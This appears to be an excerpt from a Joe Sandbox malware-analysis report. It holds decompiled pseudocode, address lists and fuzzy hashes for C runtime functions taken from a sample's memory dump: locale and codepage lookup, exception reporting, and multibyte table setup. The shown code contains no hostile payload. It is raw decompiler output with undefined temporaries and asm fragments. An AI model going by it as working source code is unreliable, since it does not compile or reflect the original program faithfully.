0x001afd89
0x001afd8d
0x001afd8e
0x001afe16
0x001afe16
0x001afe18
0x001afe24
0x001afe2e
0x001afe32
0x001afe34
0x001afe05
0x001afe05
0x001afe07
0x001afe15
0x001afe15
0x001afe3a
0x001afe40
0x001afe42
0x00000000
0x00000000
0x001afe49
0x001afe4f
0x001afe51
0x00000000
0x00000000
0x001afe53
0x001afe56
0x001afe58
0x001afe5a
0x001afe5a
0x001afe6b
0x001afe70
0x001afe72
0x001afed2
0x001afed4
0x00000000
0x001afed4
0x001afe77
0x001afe81
0x001afe91
0x001afe97
0x001afe99
0x00000000
0x00000000
0x001afea1
0x001afeb0
0x001afeb6
0x001afeb8
0x00000000
0x00000000
0x001afec2
0x001afeca
0x00000000
0x001afecf
0x001afd94
0x001afda3
0x001afda8
0x001afdad
0x001afdfd
0x001afdfd
0x001afdfd
0x001afdff
0x001afe03
0x00000000
0x00000000
0x00000000
0x001afe03
0x001afdaf
0x001afdb1
0x001afdb5
0x001afdc7
0x001afdcb
0x001afdd0
0x001afdd0
0x00000000
0x001afdd0
0x001afdb7
0x001afdba
0x00000000
0x00000000
0x001afdc0
0x00000000
0x001afdc0
0x001afd70
0x001afd73
0x00000000
0x00000000
0x001afd79
0x00000000
0x001afd79

APIs

Part of subcall function 001A5D71: GetLastError.KERNEL32(?,00000000,?,0019D1A2,00000000,00000000,?,?,001A8943,00000000,00000000,00000000,00000000,?), ref: 001A5D76
Part of subcall function 001A5D71: SetLastError.KERNEL32(00000000,00000002,000000FF,?,001A8943,00000000,00000000,00000000,00000000,?), ref: 001A5E14

Part of subcall function 001A5D71: _free.LIBCMT ref: 001A5DD3
Part of subcall function 001A5D71: _free.LIBCMT ref: 001A5E09

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 001AFDF1
IsValidCodePage.KERNEL32(00000000), ref: 001AFE3A
IsValidLocale.KERNEL32(?,00000001), ref: 001AFE49
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 001AFE91
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 001AFEB0

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID:
API String ID: 949163717-0
Opcode ID: 1061ee2933d017ad244f8871b010bed756754d9a11ec21740f1be7618f80af90
Instruction ID: 688242e939bb44c9dbd5f4c5ecfb4718d5301d02a165e3ebbdb807ccc5994e5b
Opcode Fuzzy Hash: 1061ee2933d017ad244f8871b010bed756754d9a11ec21740f1be7618f80af90
Instruction Fuzzy Hash: A551A079A00205ABDB11DFE4CC45ABEB3B8FF1A700F15413DE914E7191EB709A45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001AF384 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 70%

			E001AF384(void* __ecx, void* __edx, void* __eflags, intOrPtr* _a4, signed short* _a8, intOrPtr _a12) {
				intOrPtr* _v8;
				short _v12;
				signed int _v32;
				intOrPtr _v40;
				signed int _v52;
				char _v272;
				short _v292;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t33;
				short* _t34;
				intOrPtr* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed short _t39;
				signed short* _t42;
				intOrPtr _t45;
				void* _t47;
				signed int _t50;
				void* _t52;
				signed int _t56;
				void* _t68;
				void* _t72;
				void* _t73;
				void* _t77;
				intOrPtr* _t84;
				short* _t86;
				void* _t88;
				intOrPtr* _t91;
				intOrPtr* _t95;
				short _t113;
				void* _t114;
				intOrPtr* _t116;
				intOrPtr _t119;
				signed int* _t120;
				void* _t121;
				intOrPtr* _t123;
				signed short _t125;
				int _t127;
				void* _t128;
				void* _t131;
				signed int _t132;

				_push(__ecx);
				_push(__ecx);
				_t84 = _a4;
				_t33 = E001A5D71(__ecx, __edx);
				_t113 = 0;
				_v12 = 0;
				_t3 = _t33 + 0x50; // 0x50
				_t123 = _t3;
				_t4 = _t123 + 0x250; // 0x2a0
				_t34 = _t4;
				 *((intOrPtr*)(_t123 + 8)) = 0;
				 *_t34 = 0;
				_t6 = _t123 + 4; // 0x54
				_t116 = _t6;
				_v8 = _t34;
				_t91 = _t84;
				_t35 = _t84 + 0x80;
				 *_t123 = _t84;
				 *_t116 = _t35;
				if( *_t35 != 0) {
					E001AF317(0x1b8640, 0x16, _t116);
					_t91 =  *_t123;
					_t131 = _t131 + 0xc;
					_t113 = 0;
				}
				_push(_t123);
				if( *_t91 == _t113) {
					E001AEC88(_t84, _t91);
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t116)) == _t113) {
						E001AEDA8();
					} else {
						E001AED0F(_t91);
					}
					if( *((intOrPtr*)(_t123 + 8)) == 0) {
						_t77 = E001AF317(0x1b8330, 0x40, _t123);
						_t131 = _t131 + 0xc;
						if(_t77 != 0) {
							_push(_t123);
							if( *((intOrPtr*)( *_t116)) == 0) {
								E001AEDA8();
							} else {
								E001AED0F(0);
							}
							L12:
						}
					}
				}
				if( *((intOrPtr*)(_t123 + 8)) == 0) {
					L37:
					_t37 = 0;
					goto L38;
				} else {
					_t38 = _t84 + 0x100;
					if( *_t84 != 0 ||  *_t38 != 0) {
						_t39 = E001AF1D4(_t38, _t123);
					} else {
						_t39 = GetACP();
					}
					_t125 = _t39;
					if(_t125 == 0 || _t125 == 0xfde8 || IsValidCodePage(_t125 & 0x0000ffff) == 0) {
						goto L37;
					} else {
						_t42 = _a8;
						if(_t42 != 0) {
							 *_t42 = _t125;
						}
						_t119 = _a12;
						if(_t119 == 0) {
							L36:
							_t37 = 1;
							L38:
							return _t37;
						} else {
							_t95 = _v8;
							_t15 = _t119 + 0x120; // 0xd0
							_t86 = _t15;
							 *_t86 = 0;
							_t16 = _t95 + 2; // 0x6
							_t114 = _t16;
							do {
								_t45 =  *_t95;
								_t95 = _t95 + 2;
							} while (_t45 != _v12);
							_t18 = (_t95 - _t114 >> 1) + 1; // 0x3
							_t47 = E001AC52A(_t86, 0x55, _v8);
							_t132 = _t131 + 0x10;
							if(_t47 != 0) {
								L39:
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E001A016C();
								asm("int3");
								_t130 = _t132;
								_t50 =  *0x1c3014; // 0x88921fa2
								_v52 = _t50 ^ _t132;
								_push(_t86);
								_push(_t125);
								_push(_t119);
								_t52 = E001A5D71(_t97, _t114);
								_t87 = _t52;
								_t120 =  *(E001A5D71(_t97, _t114) + 0x34c);
								_t127 = E001AFABF(_v40);
								asm("sbb ecx, ecx");
								_t56 = GetLocaleInfoW(_t127, ( ~( *(_t52 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
								if(_t56 != 0) {
									if(E001AC275(_t120, _t127,  *((intOrPtr*)(_t87 + 0x54)),  &_v272) == 0 && E001AFBF1(_t127) != 0) {
										 *_t120 =  *_t120 | 0x00000004;
										_t120[2] = _t127;
										_t120[1] = _t127;
									}
									_t62 =  !( *_t120 >> 2) & 0x00000001;
								} else {
									 *_t120 =  *_t120 & _t56;
									_t62 = _t56 + 1;
								}
								_pop(_t121);
								_pop(_t128);
								_pop(_t88);
								return E00197F14(_t62, _t88, _v32 ^ _t130, _t114, _t121, _t128);
							} else {
								if(E001A84AC(_t86, 0x1001, _t119, 0x40) == 0) {
									goto L37;
								} else {
									_t20 = _t119 + 0x80; // 0x30
									_t86 = _t20;
									_t21 = _t119 + 0x120; // 0xd0
									if(E001A84AC(_t21, 0x1002, _t86, 0x40) == 0) {
										goto L37;
									} else {
										_t68 = E001B350B(_t86, 0x5f);
										_pop(_t97);
										if(_t68 != 0) {
											L31:
											_t22 = _t119 + 0x120; // 0xd0
											if(E001A84AC(_t22, 7, _t86, 0x40) == 0) {
												goto L37;
											} else {
												goto L32;
											}
										} else {
											_t73 = E001B350B(_t86, 0x2e);
											_pop(_t97);
											if(_t73 == 0) {
												L32:
												_t119 = _t119 + 0x100;
												if(_t125 != 0xfde9) {
													E001B21FE(_t97, _t125, _t119, 0x10, 0xa);
													goto L36;
												} else {
													_push(5);
													_t72 = E001AC52A(_t119, 0x10, L"utf8");
													_t132 = _t132 + 0x10;
													if(_t72 != 0) {
														goto L39;
													} else {
														goto L36;
													}
												}
											} else {
												goto L31;
											}
										}
									}
								}
							}
						}
					}
				}
			}

0x001af389
0x001af38a
0x001af38c
0x001af391
0x001af398
0x001af39a
0x001af39d
0x001af39d
0x001af3a0
0x001af3a0
0x001af3a6
0x001af3a9
0x001af3ac
0x001af3ac
0x001af3af
0x001af3b2
0x001af3b4
0x001af3ba
0x001af3bc
0x001af3c1
0x001af3cb
0x001af3d0
0x001af3d2
0x001af3d5
0x001af3d5
0x001af3d7
0x001af3db
0x001af424
0x00000000
0x001af3dd
0x001af3e2
0x001af3eb
0x001af3e4
0x001af3e4
0x001af3e4
0x001af3f6
0x001af400
0x001af405
0x001af40a
0x001af410
0x001af414
0x001af41d
0x001af416
0x001af416
0x001af416
0x001af429
0x001af429
0x001af40a
0x001af3f6
0x001af42f
0x001af56b
0x001af56b
0x00000000
0x001af435
0x001af435
0x001af43e
0x001af44f
0x001af445
0x001af445
0x001af445
0x001af456
0x001af45a
0x00000000
0x001af47e
0x001af47e
0x001af483
0x001af485
0x001af485
0x001af487
0x001af48c
0x001af566
0x001af568
0x001af56d
0x001af571
0x001af492
0x001af492
0x001af495
0x001af495
0x001af49d
0x001af4a0
0x001af4a0
0x001af4a3
0x001af4a3
0x001af4a6
0x001af4a9
0x001af4b3
0x001af4bd
0x001af4c2
0x001af4c7
0x001af572
0x001af574
0x001af575
0x001af576
0x001af577
0x001af578
0x001af579
0x001af57e
0x001af582
0x001af58a
0x001af591
0x001af594
0x001af595
0x001af599
0x001af59a
0x001af59f
0x001af5a7
0x001af5b6
0x001af5c2
0x001af5d3
0x001af5db
0x001af5f5
0x001af602
0x001af605
0x001af608
0x001af608
0x001af612
0x001af5dd
0x001af5dd
0x001af5df
0x001af5df
0x001af618
0x001af619
0x001af61c
0x001af623
0x001af4cd
0x001af4dd
0x00000000
0x001af4e3
0x001af4e5
0x001af4e5
0x001af4f1
0x001af4ff
0x00000000
0x001af501
0x001af504
0x001af50a
0x001af50d
0x001af51d
0x001af522
0x001af530
0x00000000
0x00000000
0x00000000
0x00000000
0x001af50f
0x001af512
0x001af518
0x001af51b
0x001af532
0x001af532
0x001af53e
0x001af55e
0x00000000
0x001af540
0x001af540
0x001af54a
0x001af54f
0x001af554
0x00000000
0x001af556
0x00000000
0x001af556
0x001af554
0x00000000
0x00000000
0x00000000
0x001af51b
0x001af50d
0x001af4ff
0x001af4dd
0x001af4c7
0x001af48c
0x001af45a

APIs

Part of subcall function 001A5D71: GetLastError.KERNEL32(?,00000000,?,0019D1A2,00000000,00000000,?,?,001A8943,00000000,00000000,00000000,00000000,?), ref: 001A5D76
Part of subcall function 001A5D71: SetLastError.KERNEL32(00000000,00000002,000000FF,?,001A8943,00000000,00000000,00000000,00000000,?), ref: 001A5E14

GetACP.KERNEL32(?,?,?,?,?,?,001A3BC4,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 001AF445
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,001A3BC4,?,?,?,00000055,?,-00000050,?,?), ref: 001AF470
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 001AF5D3

Strings

utf8, xrefs: 001AF542

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: 85fd78e65c976c83ab6108c432dd1e393c655a96e400fbfeb79db25e21b9e7da
Instruction ID: 363fec2fd918d7c3bc26c2ea34b8a30770a4a0d47cacf418d28a8caaefea400a
Opcode Fuzzy Hash: 85fd78e65c976c83ab6108c432dd1e393c655a96e400fbfeb79db25e21b9e7da
Instruction Fuzzy Hash: 97710539A00702AADB29AFB4DC46BB773A8EF5A710F14443DF915DB181EB70ED428760

Uniqueness

Uniqueness Score: -1.00%

Function 001984C9 Relevance: 6.1, APIs: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E001984C9(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E0019868D(_t34);
				 *_t60 = 0x2cc;
				_v632 = E00199180(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E00199180(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E0019868D(_t49);
				}
				return _t49;
			}

0x001984c9
0x001984c9
0x001984c9
0x001984dd
0x001984df
0x001984e2
0x001984e2
0x001984e6
0x001984eb
0x00198503
0x00198509
0x0019850f
0x00198515
0x0019851b
0x00198521
0x00198527
0x0019852e
0x00198535
0x0019853c
0x00198543
0x0019854a
0x00198551
0x00198552
0x0019855b
0x00198561
0x00198564
0x0019856a
0x00198579
0x00198585
0x00198590
0x00198597
0x0019859e
0x001985a9
0x001985b1
0x001985ba
0x001985bc
0x001985bf
0x001985c1
0x001985cb
0x001985d3
0x001985d9
0x00000000
0x001985e0
0x001985e3

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 001984D5
IsDebuggerPresent.KERNEL32 ref: 001985A1
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 001985C1
UnhandledExceptionFilter.KERNEL32(?), ref: 001985CB

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 485205302867fb731803a9b52a993b59d89bab8e60c89a4ba677800b1f8970aa
Instruction ID: 9892a3306fff128613669cbfc08c4f444c3628af305f5d2711996f635b32ee85
Opcode Fuzzy Hash: 485205302867fb731803a9b52a993b59d89bab8e60c89a4ba677800b1f8970aa
Instruction Fuzzy Hash: 60314975D0521C9BDF20EFA4D989BCCBBB8BF08300F1041AAE50CAB251EB745A84CF45

Uniqueness

Uniqueness Score: -1.00%

Function 001A1D9B Relevance: 22.9, APIs: 15, Instructions: 357
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E001A1D9B(void* __edx, intOrPtr* _a4) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				intOrPtr* _v56;
				signed int _v60;
				signed int _v64;
				signed int* _v68;
				intOrPtr _v72;
				signed int* _v76;
				signed int** _v80;
				signed int** _v84;
				void* _v88;
				char _v92;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t126;
				signed int* _t129;
				intOrPtr* _t131;
				signed int* _t147;
				signed short _t150;
				signed int _t151;
				void* _t153;
				void* _t156;
				void* _t159;
				void* _t160;
				void* _t164;
				signed int _t165;
				signed int* _t166;
				signed char _t183;
				signed int* _t186;
				void* _t190;
				char _t195;
				signed char _t197;
				void* _t204;
				signed int* _t205;
				void* _t207;
				signed int* _t209;
				void* _t212;
				intOrPtr _t213;
				intOrPtr _t217;
				signed int* _t221;
				intOrPtr _t222;
				signed int _t223;
				void* _t227;
				signed int _t230;
				char* _t231;
				intOrPtr _t232;
				signed int* _t235;
				signed char* _t236;
				signed int** _t239;
				signed int** _t240;
				signed char* _t249;
				void* _t251;
				intOrPtr* _t252;
				void* _t255;
				signed int _t256;
				short* _t257;
				signed int _t260;
				signed int _t261;
				void* _t262;
				void* _t263;

				_t233 = __edx;
				_t126 =  *0x1c3014; // 0x88921fa2
				_v8 = _t126 ^ _t261;
				_t252 = _a4;
				_t205 = 0;
				_v56 = _t252;
				_t237 = 0;
				_v32 = 0;
				_t213 =  *((intOrPtr*)(_t252 + 0xa8));
				_v36 = 0;
				_v40 = 0;
				_v92 = _t252;
				_v88 = 0;
				if(_t213 == 0) {
					__eflags =  *(_t252 + 0x8c);
					if( *(_t252 + 0x8c) != 0) {
						asm("lock dec dword [eax]");
					}
					 *(_t252 + 0x8c) = _t205;
					_t129 = 0;
					__eflags = 0;
					 *(_t252 + 0x90) = _t205;
					 *_t252 = 0x1b69a0;
					 *(_t252 + 0x94) = 0x1b6c20;
					 *(_t252 + 0x98) = 0x1b6da0;
					 *(_t252 + 4) = 1;
					L48:
					return E00197F14(_t129, _t205, _v8 ^ _t261, _t233, _t237, _t252);
				}
				_t131 = _t252 + 8;
				_v52 = 0;
				if( *_t131 != 0) {
					L3:
					_v52 = E001A58A2(1, 4);
					E001A71B2(_t205);
					_v32 = E001A58A2(0x180, 2);
					E001A71B2(_t205);
					_t237 = E001A58A2(0x180, 1);
					_v44 = _t237;
					E001A71B2(_t205);
					_v36 = E001A58A2(0x180, 1);
					E001A71B2(_t205);
					_v40 = E001A58A2(0x101, 1);
					E001A71B2(_t205);
					_t263 = _t262 + 0x3c;
					if(_v52 == _t205 || _v32 == _t205) {
						L43:
						E001A71B2(_v52);
						E001A71B2(_v32);
						E001A71B2(_t237);
						E001A71B2(_v36);
						_t205 = 1;
						__eflags = 1;
						goto L44;
					} else {
						_t217 = _v40;
						if(_t217 == 0 || _t237 == 0 || _v36 == _t205) {
							goto L43;
						} else {
							_t147 = _t205;
							do {
								 *(_t147 + _t217) = _t147;
								_t147 =  &(_t147[0]);
							} while (_t147 < 0x100);
							if(GetCPInfo( *(_t252 + 8),  &_v28) == 0) {
								goto L43;
							}
							_t150 = _v28;
							if(_t150 > 5) {
								goto L43;
							}
							_t151 = _t150 & 0x0000ffff;
							_v60 = _t151;
							if(_t151 <= 1) {
								L22:
								_t37 = _t237 + 0x81; // 0x81
								_t233 = 0xff;
								_v48 = _v40 + 1;
								_t153 = E001A7F34(_t281, _t205,  *((intOrPtr*)(_t252 + 0xa8)), 0x100, _v40 + 1, 0xff, _t37, 0xff,  *(_t252 + 8), _t205);
								_t263 = _t263 + 0x24;
								_t282 = _t153;
								if(_t153 == 0) {
									goto L43;
								}
								_t156 = E001A7F34(_t282, _t205,  *((intOrPtr*)(_t252 + 0xa8)), 0x200, _v48, 0xff, _v36 + 0x81, 0xff,  *(_t252 + 8), _t205);
								_t263 = _t263 + 0x24;
								_t283 = _t156;
								if(_t156 == 0) {
									goto L43;
								}
								_v72 = _v32 + 0x100;
								_t159 = E001AB3FB(_t283, _t205, 1, _v40, 0x100, _v32 + 0x100,  *(_t252 + 8), _t205);
								_t263 = _t263 + 0x1c;
								if(_t159 == 0) {
									goto L43;
								}
								_t160 = _v32;
								_t221 = _t160 + 0xfe;
								 *_t221 = 0;
								_t233 = _v44;
								_v76 = _t221;
								_t222 = _v36;
								_t239 = _t233 + 0x80;
								 *(_t233 + 0x7f) = _t205;
								_v80 = _t239;
								 *(_t222 + 0x7f) = _t205;
								 *_t239 = _t205;
								_t240 = _t222 + 0x80;
								_v84 = _t240;
								 *_t240 = _t205;
								if(_v60 <= 1) {
									L39:
									_t223 = 0x3f;
									_push(0x1f);
									memcpy(_v32, _v32 + 0x200, _t223 << 2);
									asm("movsw");
									_t164 = memcpy(_t233, _t233 + 0x100, 0 << 2);
									_t227 = 0x1f;
									asm("movsw");
									asm("movsb");
									_t255 = _t164 + 0x100;
									_t165 = memcpy(_t164, _t255, 0 << 2);
									_t237 = _t255 + _t227 + _t227;
									asm("movsw");
									asm("movsb");
									_t252 = _v56;
									if( *(_t252 + 0x8c) != 0) {
										asm("lock xadd [ecx], eax");
										if((_t165 | 0xffffffff) == 0) {
											E001A71B2( *(_t252 + 0x90) - 0xfe);
											_t237 = 0x80;
											E001A71B2( *(_t252 + 0x94) - 0x80);
											E001A71B2( *(_t252 + 0x98) - 0x80);
											E001A71B2( *(_t252 + 0x8c));
										}
									}
									_t166 = _v52;
									 *_t166 = 1;
									 *(_t252 + 0x8c) = _t166;
									 *_t252 = _v72;
									 *(_t252 + 0x90) = _v76;
									 *(_t252 + 0x94) = _v80;
									 *(_t252 + 0x98) = _v84;
									 *(_t252 + 4) = _v60;
									L44:
									E001A71B2(_v40);
									_t129 = _t205;
									goto L48;
								}
								if( *(_t252 + 8) != 0xfde9) {
									_t249 =  &_v22;
									__eflags = _v22 - _t205;
									if(_v22 == _t205) {
										goto L39;
									}
									_t207 = _v32;
									while(1) {
										_t183 = _t249[1];
										__eflags = _t183;
										if(_t183 == 0) {
											break;
										}
										_t256 =  *_t249 & 0x000000ff;
										_v64 = _t256;
										__eflags = _t256 - (_t183 & 0x000000ff);
										if(_t256 > (_t183 & 0x000000ff)) {
											L37:
											_t249 =  &(_t249[2]);
											__eflags =  *_t249;
											if( *_t249 != 0) {
												continue;
											}
											break;
										}
										_v48 = _t233;
										_t186 = _t222 + 0x80 + _t256;
										_t235 = _t233 - _t222;
										__eflags = _t235;
										_t230 = _v64;
										_t257 = _t207 - 0xffffff00 + _t256 * 2;
										_v68 = _t186;
										_t209 = _t186;
										do {
											 *_t257 = 0x8000;
											_t257 = _t257 + 2;
											 *(_t235 + _t209) = _t230;
											 *_t209 = _t230;
											_t230 = _t230 + 1;
											_t209 =  &(_t209[0]);
											__eflags = _t230 - (_t249[1] & 0x000000ff);
										} while (_t230 <= (_t249[1] & 0x000000ff));
										_t233 = _v44;
										_t222 = _v36;
										_t207 = _v32;
										goto L37;
									}
									L38:
									_t205 = 0;
									goto L39;
								}
								_v44 = _t160 + 0x200;
								_t231 = _t233 + 0x100;
								_t251 = _t222 - _t233;
								_t190 = 0xffffff80;
								_v48 = _t190 - _t233;
								do {
									_push(0x32);
									asm("sbb eax, eax");
									_v44 = _v44 + 2;
									 *_v44 = (0xfffffebe + _t231 & 0xffff8000) + 0x8000;
									_t212 = _v48;
									_t195 = _t231 + _t212;
									 *_t231 = _t195;
									 *((char*)(_t251 + _t231)) = _t195;
									_t231 = _t231 + 1;
								} while (_t212 + _t231 <= 0xff);
								goto L38;
							}
							_t281 =  *(_t252 + 8) - 0xfde9;
							if( *(_t252 + 8) != 0xfde9) {
								_t236 =  &_v22;
								__eflags = _v22 - _t205;
								if(__eflags == 0) {
									goto L22;
								}
								_t232 = _v40;
								while(1) {
									_t197 = _t236[1];
									__eflags = _t197;
									if(__eflags == 0) {
										break;
									}
									_t260 =  *_t236 & 0x000000ff;
									__eflags = _t260 - (_t197 & 0x000000ff);
									if(_t260 > (_t197 & 0x000000ff)) {
										L20:
										_t236 =  &(_t236[2]);
										__eflags =  *_t236 - _t205;
										if(__eflags != 0) {
											continue;
										}
										break;
									} else {
										goto L19;
									}
									do {
										L19:
										 *((char*)(_t260 + _t232)) = 0x20;
										_t260 = _t260 + 1;
										__eflags = _t260 - (_t236[1] & 0x000000ff);
									} while (_t260 <= (_t236[1] & 0x000000ff));
									goto L20;
								}
								_t252 = _v56;
								goto L22;
							}
							E00199180(_t237, _v40 - 0xffffff80, 0x20, 0x80);
							_t263 = _t263 + 0xc;
							goto L22;
						}
					}
				}
				_push(_t131);
				_push(0x1004);
				_push(_t213);
				_push(0);
				_push( &_v92);
				_t204 = E001AB24B(__edx);
				_t263 = _t262 + 0x14;
				if(_t204 != 0) {
					goto L43;
				}
				goto L3;
			}

0x001a1d9b
0x001a1da3
0x001a1daa
0x001a1daf
0x001a1db2
0x001a1db5
0x001a1db8
0x001a1dba
0x001a1dbd
0x001a1dc3
0x001a1dc6
0x001a1dc9
0x001a1dcc
0x001a1dd1
0x001a21b4
0x001a21b6
0x001a21b8
0x001a21b8
0x001a21bb
0x001a21c1
0x001a21c1
0x001a21c3
0x001a21c9
0x001a21cf
0x001a21d9
0x001a21e3
0x001a21ea
0x001a21f8
0x001a21f8
0x001a1dd7
0x001a1dda
0x001a1ddf
0x001a1dfd
0x001a1e07
0x001a1e0a
0x001a1e1d
0x001a1e20
0x001a1e2d
0x001a1e30
0x001a1e33
0x001a1e45
0x001a1e48
0x001a1e5a
0x001a1e5d
0x001a1e62
0x001a1e68
0x001a217d
0x001a2180
0x001a2188
0x001a218e
0x001a2196
0x001a21a0
0x001a21a0
0x00000000
0x001a1e77
0x001a1e77
0x001a1e7c
0x00000000
0x001a1e93
0x001a1e93
0x001a1e95
0x001a1e95
0x001a1e98
0x001a1e99
0x001a1eaf
0x00000000
0x00000000
0x001a1eb5
0x001a1ebb
0x00000000
0x00000000
0x001a1ec1
0x001a1ec4
0x001a1eca
0x001a1f20
0x001a1f23
0x001a1f2d
0x001a1f42
0x001a1f46
0x001a1f4b
0x001a1f4e
0x001a1f50
0x00000000
0x00000000
0x001a1f79
0x001a1f7e
0x001a1f81
0x001a1f83
0x00000000
0x00000000
0x001a1f9e
0x001a1fa4
0x001a1fa9
0x001a1fae
0x00000000
0x00000000
0x001a1fb4
0x001a1fbd
0x001a1fc3
0x001a1fc6
0x001a1fc9
0x001a1fcc
0x001a1fcf
0x001a1fd5
0x001a1fd8
0x001a1fdb
0x001a1fde
0x001a1fe0
0x001a1fe6
0x001a1fe9
0x001a1feb
0x001a20bb
0x001a20c2
0x001a20c3
0x001a20ce
0x001a20d3
0x001a20dd
0x001a20df
0x001a20e0
0x001a20e2
0x001a20e3
0x001a20eb
0x001a20eb
0x001a20ed
0x001a20ef
0x001a20f0
0x001a20fb
0x001a2100
0x001a2104
0x001a2112
0x001a211d
0x001a2125
0x001a2133
0x001a213e
0x001a2143
0x001a2104
0x001a2146
0x001a2149
0x001a214f
0x001a2158
0x001a215d
0x001a2166
0x001a216f
0x001a2178
0x001a21a1
0x001a21a4
0x001a21aa
0x00000000
0x001a21aa
0x001a1ff8
0x001a2051
0x001a2054
0x001a2057
0x00000000
0x00000000
0x001a2059
0x001a205c
0x001a205c
0x001a205f
0x001a2061
0x00000000
0x00000000
0x001a2063
0x001a2069
0x001a206c
0x001a206e
0x001a20b1
0x001a20b1
0x001a20b4
0x001a20b7
0x00000000
0x00000000
0x00000000
